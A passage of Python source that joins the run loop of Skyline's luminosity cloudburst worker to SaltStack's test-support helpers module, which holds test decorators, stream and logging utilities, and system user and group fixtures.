processed_anomaly_key = '%s.%s' % (base_name, str(int(processed_timestamp)))
self.redis_conn_decoded.hset(cloudburst_anomalies_processed_key, processed_anomaly_key, str(key_data))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add to %s Redis hash key - %s' % (
cloudburst_anomalies_processed_key, e))
if cloudburst_metrics_key_created:
logger.info('cloudburst :: find_cloudbursts :: created %s Redis hash key' % (
cloudburst_metrics_key))
logger.info('cloudburst :: find_cloudbursts :: added %s new cloudbursts to the database' % (
str(len(new_cloudburst_ids))))
if engine:
engine_disposal(engine)
spin_end = time() - spin_start
logger.info('cloudburst :: find_cloudbursts :: %s metrics took %.2f seconds' % (
str(len(assigned_metrics)), spin_end))
# cloudburst table
# id, source_metric_id, timestamp, full_duration, resolution, processed
# cloudbursts table
# id, cloudburst_id, related_metric_id, ppscore_1, ppscore_2
# Maybe do not just do ppscore maybe use ruptures to identify metrics
# that have changepoints in the same window
return
def run(self):
"""
- Called when the process initializes.
- Determine if Redis is up
- Spawn a find_cloudbursts process to do analysis
- Wait for the process to finish.
- run_every 300 seconds
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('luminosity/cloudburst :: starting find_cloudbursts')
if SERVER_METRIC_PATH == '':
logger.warning('warning :: luminosity/cloudburst :: settings.SERVER_METRICS_NAME is not declared in settings.py, defaults to \'\'')
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst cannot connect to redis at socket path %s - %s' % (
settings.REDIS_SOCKET_PATH, e))
sleep(10)
try:
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except Exception as e:
logger.info(traceback.format_exc())
logger.error('error :: cloudburst cannot connect to get_redis_conn - %s' % e)
continue
# Report app up
try:
self.redis_conn.setex('luminosity.cloudburst', 120, now)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: could not update the Redis luminosity.cloudburst key - %s' % e)
# Get all Redis metrics
unique_metrics = []
try:
unique_metrics = list(self.redis_conn_decoded.smembers(full_uniques))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to get unique_metrics from %s Redis key - %s' % (
full_uniques, e))
unique_metrics = []
now_timestamp = int(time())
key_reference_timestamp = (int(now_timestamp) // run_every * run_every)
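# The reference timestamp is aligned to the run_every boundary so that
# the per run Redis keys (processed_metrics and info) read back here
# match the keys the spawned find_cloudbursts processes write to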
processed_metrics_key = 'luminosity.cloudburst.processed_metrics.%s' % str(key_reference_timestamp)
cloudburst_info_key = 'luminosity.cloudburst.info.%s' % str(key_reference_timestamp)
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
for i in range(1, LUMINOSITY_CLOUDBURST_PROCESSES + 1):
if i > len(unique_metrics):
logger.warning('warning :: cloudburst :: skyline is set for more cores than needed.')
break
try:
p = Process(target=self.find_cloudbursts, args=(i, unique_metrics))
pids.append(p)
pid_count += 1
logger.info('starting %s of %s find_cloudbursts processes' % (str(pid_count), str(LUMINOSITY_CLOUDBURST_PROCESSES)))
p.start()
spawned_pids.append(p.pid)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to spawn find_cloudbursts process - %s' % e)
# Self monitor processes and terminate if any find_cloudbursts
# has run for longer than run_every - 10
p_starts = time()
while time() - p_starts <= (run_every - 10):
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('cloudburst :: %s find_cloudbursts processes completed in %.2f seconds' % (
str(LUMINOSITY_CLOUDBURST_PROCESSES), time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('cloudburst :: timed out, killing find_cloudbursts process')
for p in pids:
logger.info('cloudburst :: killing find_cloudbursts process')
p.terminate()
logger.info('cloudburst :: killed find_cloudbursts process')
for p in pids:
if p.is_alive():
try:
logger.info('cloudburst :: stopping find_cloudbursts - %s' % (str(p.is_alive())))
p.terminate()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to stop find_cloudbursts - %s' % e)
processed_metrics = []
try:
processed_metrics = list(self.redis_conn_decoded.smembers(processed_metrics_key))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to get %s set from Redis - %s' % (
processed_metrics_key, e))
processed_metrics = []
if processed_metrics:
try:
self.redis_conn.expire(processed_metrics_key, 600)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed set expire on %s Redis set - %s' % (
processed_metrics_key, e))
processed = 0
no_data = 0
too_short = 0
too_old = 0
not_analysed = 0
analysed = 0
cloudburst_info_dict = {}
try:
cloudburst_info_dict = self.redis_conn_decoded.hgetall(cloudburst_info_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to get %s hash from Redis - %s' % (
cloudburst_info_key, e))
cloudburst_info_dict = {}
if cloudburst_info_dict:
try:
self.redis_conn.expire(cloudburst_info_key, 600)
except Exception as e:
logger.error('error :: cloudburst :: failed set expire on %s Redis set - %s' % (
cloudburst_info_key, e))
for key in list(cloudburst_info_dict.keys()):
info_dict = {}
try:
info_dict = literal_eval(cloudburst_info_dict[key])
except Exception as e:
logger.error('error :: cloudburst :: failed to literal_eval cloudburst_info_dict[%s] - %s' % (
str(key), e))
info_dict = {}
if info_dict:
processed += info_dict['processed']
no_data += info_dict['no_data']
too_short += info_dict['too_short']
too_old += info_dict['too_old']
not_analysed += info_dict['not_analysed']
analysed += info_dict['analysed']
info_data_dict = {
'processed': processed,
'analysed': analysed,
'not_analysed': not_analysed,
'no_data': no_data,
'too_short': too_short,
'too_old': too_old,
}
logger.info('cloudburst :: info: %s' % str(info_data_dict))
try:
unique_metrics_set = set(list(unique_metrics))
processed_metrics_set = set(list(processed_metrics))
if unique_metrics_set == processed_metrics_set:
logger.info('cloudburst :: all %s unique_metrics were processed' % str(len(unique_metrics)))
else:
not_processed_metrics_key = 'luminosity.cloudburst.not_processed_metrics.%s' % str(key_reference_timestamp)
not_processed_metrics = []
set_difference = unique_metrics_set.difference(processed_metrics_set)
for metric_name in set_difference:
not_processed_metrics.append(metric_name)
try:
self.redis_conn.sadd(not_processed_metrics_key, metric_name)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to add %s to %s Redis set - %s' % (
metric_name, not_processed_metrics_key, e))
try:
self.redis_conn.expire(not_processed_metrics_key, 3600)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to set expire on %s Redis set - %s' % (
not_processed_metrics_key, e))
logger.warning('warning :: cloudburst :: there are %s metrics that were not processed of the %s unique_metrics' % (
str(len(not_processed_metrics)),
str(len(unique_metrics))))
del set_difference
del unique_metrics_set
del processed_metrics_set
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to determine whether the unique_metrics_set and processed_metrics_set are different - %s' % e)
process_runtime = time() - now
if process_runtime < run_every:
process_runtime_now = time() - now
sleep_for = (run_every - process_runtime_now)
logger.info('cloudburst :: sleeping for %.2f seconds due to low run time...' % sleep_for)
sleep(sleep_for)
try:
del sleep_for
except Exception as e:
logger.error('error :: cloudburst :: failed to del sleep_for - %s' % e)
try:
del process_runtime
except Exception as e:
logger.error('error :: cloudburst :: failed to del process_runtime - %s' % e)
helpers.py
"""
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
"""
import base64
import builtins
import errno
import fnmatch
import functools
import inspect
import io
import json
import logging
import os
import pathlib
import random
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import types
from contextlib import contextmanager
import attr
import pytest
import salt.ext.tornado.ioloop
import salt.ext.tornado.web
import salt.utils.files
import salt.utils.platform
import salt.utils.pycrypto
import salt.utils.stringutils
import salt.utils.versions
from pytestshellutils.exceptions import ProcessFailed
from pytestshellutils.utils import ports
from pytestshellutils.utils.processes import ProcessResult
from tests.support.mock import patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.sminion import create_sminion
from tests.support.unit import SkipTest, _id, skip
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
PRE_PYTEST_SKIP_OR_NOT = "PRE_PYTEST_DONT_SKIP" not in os.environ
PRE_PYTEST_SKIP_REASON = (
"PRE PYTEST - This test was skipped before running under pytest"
)
PRE_PYTEST_SKIP = pytest.mark.skip_on_env(
"PRE_PYTEST_DONT_SKIP", present=False, reason=PRE_PYTEST_SKIP_REASON
)
ON_PY35 = sys.version_info < (3, 6)
SKIP_INITIAL_PHOTONOS_FAILURES = pytest.mark.skip_on_env(
"SKIP_INITIAL_PHOTONOS_FAILURES",
eq="1",
reason="Failing test when PhotonOS was added to CI",
)
def no_symlinks():
"""
Check if git is installed and has symlinks enabled in the configuration.
"""
global HAS_SYMLINKS
if HAS_SYMLINKS is not None:
return not HAS_SYMLINKS
output = ""
try:
output = subprocess.Popen(
["git", "config", "--get", "core.symlinks"],
cwd=RUNTIME_VARS.TMP,
stdout=subprocess.PIPE,
universal_newlines=True,
).communicate()[0]
except OSError as exc:
if exc.errno != errno.ENOENT:
raise
except subprocess.CalledProcessError:
# git returned non-zero status
pass
HAS_SYMLINKS = False
if output.strip() == "true":
HAS_SYMLINKS = True
return not HAS_SYMLINKS
def destructiveTest(caller):
"""
Mark a test case as a destructive test, for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@destructiveTest`, it will be removed in {date}, and"
" instead use `@pytest.mark.destructive_test`.",
stacklevel=3,
)
setattr(caller, "__destructive_test__", True)
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
reason = "Destructive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def expensiveTest(caller):
"""
Mark a test case as an expensive test, for example, a test which can cost
money (Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@expensiveTest`, it will be removed in {date}, and instead"
" use `@pytest.mark.expensive_test`.",
stacklevel=3,
)
setattr(caller, "__expensive_test__", True)
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
reason = "Expensive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def slowTest(caller):
"""
Mark a test case as a slow test.
.. code-block:: python
class MyTestCase(TestCase):
@slowTest
def test_that_takes_much_time(self):
pass
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@slowTest`, it will be removed in {date}, and instead use "
"`@pytest.mark.slow_test`.",
stacklevel=3,
)
setattr(caller, "__slow_test__", True)
return caller
def flaky(caller=None, condition=True, attempts=4):
"""
Mark a test as flaky. The test will be attempted up to ``attempts``
times (four by default), looking for a successful run. After an
immediate second try, each further retry waits ``attempt ** 2`` seconds.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@flaky`, it will be removed in {date}, and instead use "
"`@pytest.mark.flaky`. See https://pypi.org/project/flaky for information on "
"how to use it.",
stacklevel=3,
)
if caller is None:
return functools.partial(flaky, condition=condition, attempts=attempts)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
flaky(caller=function, condition=condition, attempts=attempts),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, attempts):
try:
if attempt > 0:
# Run through setUp again
# We only run it after the first iteration(>0) because the regular
# test runner will have already ran setUp the first time
setup = getattr(cls, "setUp", None)
if callable(setup):
setup()
return caller(cls)
except SkipTest as exc:
cls.skipTest(exc.args[0])
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
if isinstance(exc, SkipTest):
raise exc_info[0].with_traceback(exc_info[1], exc_info[2])
if not isinstance(exc, AssertionError) and log.isEnabledFor(
logging.DEBUG
):
log.exception(exc, exc_info=exc_info)
if attempt >= attempts - 1:
# We won't try to run tearDown once the attempts are exhausted
# because the regular test runner will do that for us
raise exc_info[0].with_traceback(exc_info[1], exc_info[2])
# Run through tearDown again
teardown = getattr(cls, "tearDown", None)
if callable(teardown):
teardown()
backoff_time = attempt ** 2
log.info("Found Exception. Waiting %s seconds to retry.", backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
"""
Mark a test as requiring the tests SSH daemon running.
.. code-block:: python
class MyTestCase(TestCase):
            @requires_sshd_server
def test_create_user(self):
pass
"""
raise RuntimeError(
"Please replace @requires_sshd_server with @pytest.mark.requires_sshd_server"
)
class RedirectStdStreams:
"""
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
"""
def __init__(self, stdout=None, stderr=None):
if stdout is None:
# pylint: disable=resource-leakage
stdout = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
if stderr is None:
# pylint: disable=resource-leakage
stderr = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception: # pylint: disable=broad-except
pass
try:
self.__stderr.flush()
except Exception: # pylint: disable=broad-except
pass
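# Usage sketch (illustrative; the wrapped call is hypothetical): silence a noisy
# call for the duration of the ``with`` block.
def _example_redirect_std_streams():
    with RedirectStdStreams():
        print("this goes to os.devnull instead of the console")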
class TstSuiteLoggingHandler:
"""
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TstSuiteLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
"""
def __init__(self, level=0, format="%(levelname)s:%(message)s"):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
class ForceImportErrorOn:
"""
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
"""
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, "__import__", self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_function(self):
self.patcher.stop()
def __fake_import__(
self, name, globals_=None, locals_=None, fromlist=None, level=None
):
if level is None:
level = 0
if fromlist is None:
fromlist = []
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError("Forced ImportError raised for {!r}".format(name))
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
"Forced ImportError raised for {!r}".format(
"from {} import {}".format(name, ", ".join(fromlist))
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_function()
class MockWraps:
"""
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
"""
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
"""
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@requires_network`, it will be removed in {date}, and"
" instead use `@pytest.mark.requires_network`.",
stacklevel=3,
)
def decorator(func):
@functools.wraps(func)
def wrapper(cls, *args, **kwargs):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except OSError:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except OSError:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest("No local network was detected")
return func(cls)
if os.environ.get("NO_INTERNET"):
cls.skipTest("Environment variable NO_INTERNET is set.")
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in (
"173.194.41.198",
"173.194.41.199",
"173.194.41.200",
"173.194.41.201",
"173.194.41.206",
"173.194.41.192",
"173.194.41.193",
"173.194.41.194",
"173.194.41.195",
"173.194.41.196",
"173.194.41.197",
):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except OSError:
# Let's check the next IP
continue
else:
cls.skipTest("No internet network connection was detected")
finally:
sock.close()
return func(cls, *args, **kwargs)
return wrapper
return decorator
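# Usage sketch (illustrative; the test class/method names are hypothetical, and the
# decorator itself now points users at ``@pytest.mark.requires_network``):
def _example_requires_network():
    import unittest
    class InternetFactsTest(unittest.TestCase):
        @requires_network()
        def test_needs_internet(self):
            pass
    return InternetFactsTest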
def with_system_user(
username, on_existing="delete", delete=True, password=None, groups=None
):
"""
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user %r", username)
kwargs = {"timeout": 60, "groups": groups}
if salt.utils.platform.is_windows():
kwargs.update({"password": password})
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user %r", username)
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user %r", username)
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
cls.skipTest(
"A user named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not salt.utils.platform.is_windows() and password is not None:
if salt.utils.platform.is_darwin():
hashed_password = password
else:
hashed_password = salt.utils.pycrypto.gen_hash(password=password)
hashed_password = "'{}'".format(hashed_password)
add_pwd = cls.run_function(
"shadow.set_password", [username, hashed_password]
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running %r raised an exception: %s", func, exc, exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True], timeout=60
)
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user %r "
"afterwards did.",
username,
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user %r",
username,
)
if failure is not None:
# If an exception was thrown, raise it
raise failure[1].with_traceback(failure[2])
return wrap
return decorator
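# Usage sketch (illustrative): the decorated test method receives the created
# username as an extra argument. ``ModuleCase`` (an integration test base class
# providing ``run_function``) is an assumed import path.
def _example_with_system_user():
    from tests.support.case import ModuleCase  # assumed location
    class UserModuleTest(ModuleCase):
        @with_system_user("test-account", on_existing="delete", delete=True)
        def test_user_info(self, username):
            self.assertTrue(self.run_function("user.info", [username]))
    return UserModuleTest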
def with_system_group(group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system group to be used within a test
    case. The system group is created using the ``group`` salt module.
    The decorated testcase function must accept 'group' as an argument.
    :param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
        * delete: delete and re-create the existing group
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system group %r", group)
create_group = cls.run_function("group.add", [group])
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group %r", group)
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group %r", group)
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running %r raised an exception: %s", func, exc, exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group %r "
"afterwards did.",
group,
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group %r",
group,
)
if failure is not None:
# If an exception was thrown, raise it
raise failure[1].with_traceback(failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system user and group to be used within a
    test case. The system user is created using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user %r", username)
create_user = cls.run_function("user.add", [username])
log.debug("Creating system group %r", group)
create_group = cls.run_function("group.add", [group])
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user %r", username)
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user %r", username)
create_user = cls.run_function("user.add", [username])
if not create_user:
cls.skipTest(
"A user named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group %r", group)
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group %r", group)
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running %r raised an exception: %s", func, exc, exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
delete_group = cls.run_function("group.delete", [group])
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user %r "
"afterwards did.",
username,
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user %r",
username,
)
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group %r "
"afterwards did.",
group,
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group %r",
group,
)
if failure is not None:
# If an exception was thrown, raise it
raise failure[1].with_traceback(failure[2])
return wrap
return decorator
class WithTempfile:
def __init__(self, **kwargs):
self.create = kwargs.pop("create", True)
if "dir" not in kwargs:
kwargs["dir"] = RUNTIME_VARS.TMP
if "prefix" not in kwargs:
kwargs["prefix"] = "__salt.test."
self.kwargs = kwargs
def __call__(self, func):
self.func = func
return functools.wraps(func)(
# pylint: disable=unnecessary-lambda
lambda testcase, *args, **kwargs: self.wrap(testcase, *args, **kwargs)
# pylint: enable=unnecessary-lambda
)
def wrap(self, testcase, *args, **kwargs):
name = salt.utils.files.mkstemp(**self.kwargs)
if not self.create:
os.remove(name)
try:
return self.func(testcase, name, *args, **kwargs)
finally:
try:
os.remove(name)
except OSError:
pass
with_tempfile = WithTempfile
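# Usage sketch (illustrative; class/method names are hypothetical): the decorated
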